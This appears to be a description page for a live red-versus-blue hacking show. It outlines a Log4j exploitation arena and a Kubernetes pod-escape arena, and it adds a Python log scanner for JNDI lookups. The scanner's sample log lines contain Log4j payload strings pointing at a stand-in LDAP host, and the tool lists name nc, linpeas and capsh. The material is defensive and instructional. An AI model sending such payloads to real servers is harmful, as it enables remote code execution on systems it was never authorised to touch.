Descriptions:
First PWN at 27:30
Second PWN at 1:03:23
COUNTdown:
https://www.instagram.com/dariazaritskaya/
===== OUR SPONSORS ===================
https://SPYDERbat.com
Cloud Native Runtime Security
====== Get your HACKERmask on ========
https://discord.gg/BZ9jjHAypP
======================================
Hosts:
Craig Ellrod, https://www.linkedin.com/in/craigellrod/ … §ƱЯfↁ4wg … “Ꝅ1₪ꞡƿꟺ₪ of the HACKERverse (ʰᵛ 0ˣ0000)”
Michael Foster, https://www.linkedin.com/in/mfosterche/ … ƕ4Яↁß4££$ (ʰᵛ 0ˣ0015)
Steve Giguere, https://www.linkedin.com/in/stevegiguere/ … $ꝄƱ11$Ꝅ4ꝉ3Я (ʰᵛ 0ˣ0013)
Red Team:
James Beers, https://www.linkedin.com/in/james-beers-7223b31b1/ … ₪3ɱ0Ж0 (ʰᵛ 0ˣ0007)
Tyler Belmonte, https://www.linkedin.com/in/tylerbelmonte/ … $ꟺ1$$¢ƕ33$€ (ʰᵛ 0ˣ000D)
Michael Schlosser, https://www.linkedin.com/in/michael-m-schlosser-0gr3/ … 0ꞡЯ3 (ʰᵛ 0ˣ0009)
Blue Team:
Brent Haub, https://www.linkedin.com/in/brenthaub/ … ¢ƕ1€ꟻЯƱ₪₪1₪ꞡꝉ4Яꞡ3ꝉ
Seth Goldhammer, https://www.linkedin.com/in/sethgoldhammer/ … $0¢4113ↁ$3ꝉƕ
Arena 1 – Log4j
TIME TO PWN: 11:19 minutes (plus a few, cus Craig forgot to start the timer)
Attack:
This is how the Log4j vulnerability can be exploited:
An attacker finds a server running a vulnerable Log4j version.
They send the targeted server a GET request containing a link to their malicious LDAP server.
The targeted server, instead of verifying the request, connects directly to this LDAP server.
The attacker's LDAP server then sends the targeted server a response containing malicious code. Because the Log4j vulnerability allows that code to be received and executed without verification, the attacker can use this weakness to break into the target server and exploit connected systems, networks, and devices.
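The detection side of the request step above, as an added example that is not from the video or its hosts: a Python scan of web access logs for lookup strings that point the logger at a remote LDAP, RMI or DNS server, including percent-encoded forms. The `${jndi:...}` string is Log4j's lookup syntax; the function names, log lines, addresses and hostnames are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined-log-format fields that carry client-controlled text.
_LINE = re.compile(r'^(?P<src>\S+) .*?"(?P<request>[^"]*)" \d{3} \S+ '
                   r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# A lookup that makes the logger contact a remote naming/directory server.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://([^/}\s:]+)", re.I)

def decode(text, max_rounds=3):
    """Percent-decode repeatedly so single- and double-encoded values compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(log_lines):
    """Return (source_ip, field, scheme, remote_host) for every field holding a JNDI lookup."""
    hits = []
    for line in log_lines:
        parsed = _LINE.match(line)
        # Lines in an unexpected format are still scanned, as one "raw" field.
        fields = parsed.groupdict() if parsed else {"src": "-", "raw": line}
        for name, value in fields.items():
            if name == "src":
                continue
            match = _JNDI.search(decode(value))
            if match:
                hits.append((fields["src"], name, match.group(1).lower(), match.group(2)))
    return hits

# Constructed sample access-log lines (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2022:10:00:05 +0000] "GET /?q=${jndi:ldap://ldap.example.net/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Jan/2022:10:00:09 +0000] "GET /?q=%2524%257Bjndi%253Aldap%253A%252F%252Fldap.example.net%252Fa%257D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.4 - - [10/Jan/2022:10:00:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:LDAP://ldap.example.net/a}"',
    '198.51.100.3 - - [10/Jan/2022:10:00:20 +0000] "GET /docs/jndi-ldap-howto HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(hit)
```

The reported remote host is the value to correlate with outbound LDAP connections from the server, since a lookup string in a log only shows an attempt, not a successful callback.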
Tools/commands:
nmap
nikto
curl
fuser
python
nc
stty
fg
ssh
linpeas
docker enumeration
ldap
web app
dirbuster
burpsuite
wappalyzer
Defend:
Spyderbat
Arena 2 – Kubernetes
TIME TO PWN: 12:59 minutes
Attack:
The attacker has found a K8s port with an open dev shell active in a pod in the K8s cluster. They are going to take advantage of this and try to escalate the attack to take over the root machine. As the attacker traverses the cluster and its pods, Spyderbat tracks them, allowing the developers to properly fix the issues before someone else can attack their infrastructure.
Tools/commands:
capsh
mount
ls
read
find
Defend:
Spyderbat